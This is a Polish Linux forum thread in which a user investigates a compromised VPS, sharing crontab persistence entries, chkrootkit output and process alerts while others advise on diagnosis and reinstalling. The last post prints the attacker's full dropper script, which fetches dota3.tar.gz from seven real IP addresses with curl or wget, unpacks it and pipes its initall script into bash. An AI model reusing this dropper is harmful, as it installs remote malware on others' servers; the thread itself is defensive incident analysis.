Nie jesteś zalogowany.
Jeśli nie posiadasz konta, zarejestruj je już teraz! Pozwoli Ci ono w pełni korzystać z naszego serwisu. Spamerom dziękujemy!
Ogłoszenie
Prosimy o pomoc dla małej Julki — przekaż 1% podatku na Fundacji Dzieciom zdazyć z Pomocą.
Więcej informacji na dug.net.pl/pomagamy/.
#26 2020-05-03 21:28:09
Blackhole - 
Użytkownik
Re: Mój VPS podobno atakuje
BiExi napisał(-a):
Blackhole napisz co Ci dodali do tego crontaba
istnieje duże prawdopodobieństwo iż ktoś robi sobie reverse shella bo któraś z usług jest na to podatna
Wpisy crontab-a zamienili mi na:
Kod:
1 1 */2 * * /home/j/.configrc/a/upd>/dev/null 2>&1 @reboot /home/j/.configrc/a/upd>/dev/null 2>&1 5 8 * * 0 /home/j/.configrc/b/sync>/dev/null 2>&1 @reboot /home/j/.configrc/b/sync>/dev/null 2>&1 0 0 */3 * * /tmp/.X25-unix/.rsync/c/aptitude>/dev/null 2>&1
Offline
#27 2020-05-03 23:16:38
Jacekalex - Podobno człowiek...;)
- Jacekalex
- Podobno człowiek...;)
- Skąd: /dev/random
- Zarejestrowany: 2008-01-07
Re: Mój VPS podobno atakuje
Musisz namierzyć parent proces dla tych wszystkich zmian, pewnie ukrywa się w kilku miejscach i pod różnymi nazwami.
Zainstaluj chkrootkit i pokaż na początek wynik z roota:
Kod:
chkrootkit -q
To jest zdecydowanie najprostsze działanie, jakie możesz zrobić.
W demokracji każdy naród ma taką władzę, na jaką zasługuje ;)
Si vis pacem para bellum ;) | Pozdrawiam :)
Offline
#28 2020-05-04 07:45:49
Blackhole - Użytkownik
Re: Mój VPS podobno atakuje
Jacekalex napisał(-a):
Zainstaluj chkrootkit i pokaż na początek wynik z roota:
Kod:
chkrootkit -q
A więc tak:
Kod:
# chkrootkit -q /usr/lib/jvm/.java-1.8.0-openjdk-amd64.jinfo /usr/lib/jvm/.java-1.11.0-openjdk-amd64.jinfo /usr/lib/pymodules/python2.7/.path eth0: PACKET SNIFFER(/sbin/dhclient[595]) The tty of the following user process(es) were not found in /var/run/utmp ! ! RUID PID TTY CMD ! root 589 tty7 /usr/lib/xorg/Xorg :0 -seat seat0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch #
Offline
#29 2020-05-04 14:14:51
Jacekalex - Podobno człowiek...;)
- Jacekalex
- Podobno człowiek...;)
- Skąd: /dev/random
- Zarejestrowany: 2008-01-07
Re: Mój VPS podobno atakuje
Blackhole napisał(-a):
Kod:
/usr/lib/jvm/.java-1.8.0-openjdk-amd64.jinfo /usr/lib/jvm/.java-1.11.0-openjdk-amd64.jinfo /usr/lib/pymodules/python2.7/.path
tu namierzył na 99% twoje backdoory, systemowy instalator raczej nie używa ukrytych katalogów /usr/lib/.
Poza tym co robi Xorg na VPSie?
Ostatnio edytowany przez Jacekalex (2020-05-04 14:15:48)
W demokracji każdy naród ma taką władzę, na jaką zasługuje ;)
Si vis pacem para bellum ;) | Pozdrawiam :)
Offline
#30 2020-05-04 14:35:06
Blackhole - Użytkownik
Re: Mój VPS podobno atakuje
Czyli wystarczy to usunąć i powinno być po krzyku?
Xorg jest tam, gdyż uruchamiam w środowisku graficznym platformę MT4 do Forex-u.
--- edit ---
To jednak nie ten backdoor.
Te ukryte .java* w /usr/lib/jvm to nie są katalogi, lecz pliki tekstowe (nie skrypty).
Ten trzeci plik /usr/lib/pymodules/python2.7/.path zawiera jedynie ścieżkę.
Ostatnio edytowany przez Blackhole (2020-05-04 16:16:34)
Offline
#31 2020-05-04 16:21:42
hi - Zbanowany
- hi
- Zbanowany
- Zarejestrowany: 2016-03-24
Re: Mój VPS podobno atakuje
Jacekalex napisał(-a):
systemowy instalator raczej nie używa ukrytych katalogów /usr/lib/
java używa, w sumie można rzec, że sama w sobie jest 'legalnym backdoorem' :)
Ostatnio edytowany przez hi (2020-05-04 16:22:57)
"Są drogi, którymi nie należy podążać, armie, których nie należy atakować, fortece, których nie należy oblegać, terytoria, o które nie należy walczyć, zarządzenia, których nie należy wykonywać" Sun Tzu
Offline
#32 2020-05-04 18:40:41
morfik - Cenzor wirtualnego świata
Re: Mój VPS podobno atakuje
Jacekalex napisał(-a):
Blackhole napisał(-a):
Kod:
/usr/lib/jvm/.java-1.8.0-openjdk-amd64.jinfo /usr/lib/jvm/.java-1.11.0-openjdk-amd64.jinfo /usr/lib/pymodules/python2.7/.pathtu namierzył na 99% twoje backdoory, systemowy instalator raczej nie używa ukrytych katalogów /usr/lib/.
Poza tym co robi Xorg na VPSie?
No ale przecie:
Kod:
# apt-file search /usr/lib/jvm/.java-1.8.0-openjdk-amd64.jinfo
openjdk-8-jre-headless: /usr/lib/jvm/.java-1.8.0-openjdk-amd64.jinfo
# apt-file search /usr/lib/jvm/.java-1.11.0-openjdk-amd64.jinfo
openjdk-11-jre-headless: /usr/lib/jvm/.java-1.11.0-openjdk-amd64.jinfo
# apt-cache policy openjdk-8-jre-headless
openjdk-8-jre-headless:
Installed: 8u252-b09-1
Candidate: 8u252-b09-1
Version table:
*** 8u252-b09-1 990
990 https://deb.debian.org/debian sid/main amd64 Packages
100 /var/lib/dpkg/status
# apt-cache policy openjdk-11-jre-headless
openjdk-11-jre-headless:
Installed: (none)
Candidate: 11.0.7+10-3
Version table:
11.0.7+10-3 990
990 https://deb.debian.org/debian sid/main amd64 Packages
11.0.7+9-1 500
500 https://deb.debian.org/debian testing/main amd64 PackagesTen ostatni z python2 pewnie już wyleciał z debiana z powodu usuwania python2.
Ostatnio edytowany przez morfik (2020-05-04 18:41:26)
Offline
#33 2020-05-10 14:15:54
Blackhole - Użytkownik
Re: Mój VPS podobno atakuje
Dziś mój automatyczny security-check znalazł takie coś:
Kod:
2020-05-10/nie 14:09| ALERT! /proc/*/exe deleted:
lrwxrwxrwx 1 lightdm lightdm 0 kwi 23 07:39 /proc/1261/exe -> /lib/systemd/systemd (deleted)
lrwxrwxrwx 1 root root 0 kwi 23 07:39 /proc/1262/exe -> /lib/systemd/systemd (deleted)
lrwxrwxrwx 1 fx fx 0 kwi 28 01:39 /proc/25733/exe -> /lib/systemd/systemd (deleted)
lrwxrwxrwx 1 root root 0 kwi 27 17:39 /proc/25734/exe -> /lib/systemd/systemd (deleted)
lrwxrwxrwx 1 j j 0 maj 10 11:57 /proc/5778/exe -> /lib/systemd/systemd (deleted)
lrwxrwxrwx 1 root root 0 maj 10 11:57 /proc/5779/exe -> /lib/systemd/systemd (deleted)
lrwxrwxrwx 1 root root 0 maj 3 17:10 /proc/6587/exe -> /lib/systemd/systemd-logind (deleted)
2020-05-10/nie 14:09| Szczegóły:
[1261]
comm: systemd
cmdline: /lib/systemd/systemd--user
loginuid: 117
[1262]
comm: (sd-pam)
cmdline: (sd-pam)
loginuid: 117
[25733]
comm: systemd
cmdline: /lib/systemd/systemd--user
loginuid: 1000
[25734]
comm: (sd-pam)
cmdline: (sd-pam)
loginuid: 1000
[5778]
comm: systemd
cmdline: /lib/systemd/systemd--user
loginuid: 1004
[5779]
comm: (sd-pam)
cmdline: (sd-pam)
loginuid: 1004
[6587]
comm: systemd-logind
cmdline: /lib/systemd/systemd-logind
loginuid: 4294967295Nie istnieje plik /lib/systemd/systemd--user.
Czy to jest Waszym zdaniem podejrzane? Jak to bardziej szczegółowo zbadać?
Offline
#34 2020-05-10 22:13:30
Jacekalex - Podobno człowiek...;)
- Jacekalex
- Podobno człowiek...;)
- Skąd: /dev/random
- Zarejestrowany: 2008-01-07
Re: Mój VPS podobno atakuje
Jeżeli jakieś backdoory włazły do serwera, to najlepiej go zaorać i postawić od nowa, a ważne rzeczy z backupu przywrócić.
Szukanie backdoora w systemie, kiedy się podszywa pod różne aplikacje, to zabawa w kotka i myszkę, albo szukanie igły w stogu siana.
Żeby sobie z tym poradzić trzeba sporo doświadczenia praktycznego.
Pozdro
W demokracji każdy naród ma taką władzę, na jaką zasługuje ;)
Si vis pacem para bellum ;) | Pozdrawiam :)
Offline
#35 2020-05-11 14:14:06
Blackhole - Użytkownik
Re: Mój VPS podobno atakuje
Udało mi się znaleźć skrypt, który zaciągał kod z innych serwerów i instalował na moim VPS. Skrypt był wywoływany tak:
Kod:
/bin/bash./tddwrt7s.sh http://149.202.162.73/dota3.tar.gz http://137.74.80.36/dota3.tar.gz http://167.114.36.165/dota3.tar.gz http://159.203.69.48/dota3.tar.gz http://37.139.0.226/dota3.tar.gz http://45.55.210.248/dota3.tar.gz http://192.241.211.94/dota3.tar.gz
a jego kod jest taki:
Kod:
# cat tddwrt7s.sh
#!/bin/bash
if [[ "$ARCH" =~ ^arm ]]; then
echo "Arm detected. Exiting"
pkill -9 rsync
kill -9 `ps x|grep rsync|grep -v grep|awk '{print $1}'`> .out
for pid in $(ps -ef | grep "rsync" | awk '{print $2}'); do kill -9 $pid; done> .out
exit 0
fi
rm -rf /tmp/.X2*
if [ -d "/tmp/.X25-unix/.rsync/c" ]; then
exit 0
else
cd /tmp
rm -rf .ssh
rm -rf .mountfs
rm -rf .X2*
rm -rf .X3*
rm -rf .X19-unix*
rm -rf .X21-unix*
rm -rf .X22-unix*
rm -rf .X23-unix
rm -rf .X25-unix
mkdir .X25-unix
cd .X25-unix
RANGE=6
s=$RANDOM
let "s %= $RANGE"
if [ $s == 0 ]; then
sleep $[ ( $RANDOM % 500 ) + 15 ]s
curl -O -f $1 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $1
fi
if [ $s == 1 ]; then
sleep $[ ( $RANDOM % 500 ) + 5 ]s
curl -O -f $2 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $2
fi
if [ $s == 2 ]; then
sleep $[ ( $RANDOM % 500 ) + 25 ]s
curl -O -f $3 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $3
fi
if [ $s == 3 ]; then
sleep $[ ( $RANDOM % 500 ) + 10 ]s
curl -O -f $4 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $4
fi
if [ $s == 4 ]; then
sleep $[ ( $RANDOM % 500 ) + 30 ]s
curl -O -f $5 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $5
fi
if [ $s == 5 ]; then
sleep $[ ( $RANDOM % 500 ) + 15 ]s
curl -O -f $6 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $6
fi
if [ $s == 6 ]; then
sleep $[ ( $RANDOM % 500 ) + 55 ]s
curl -O -f $7 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $7
fi
sleep 60s
tar xvf dota3.tar.gz
sleep 10s
# rm -rf dota3.tar.gz
cd .rsync
cat /tmp/.X25-unix/.rsync/initall | bash 2>1&
fi
exit 0Skrypt z 1 z 7 lokalizacji pobiera plik dota3.tar.gz, rozpakowuje go i wywołuje z niego skrypt initall.
Ostatnio edytowany przez Blackhole (2020-05-11 14:17:01)
Offline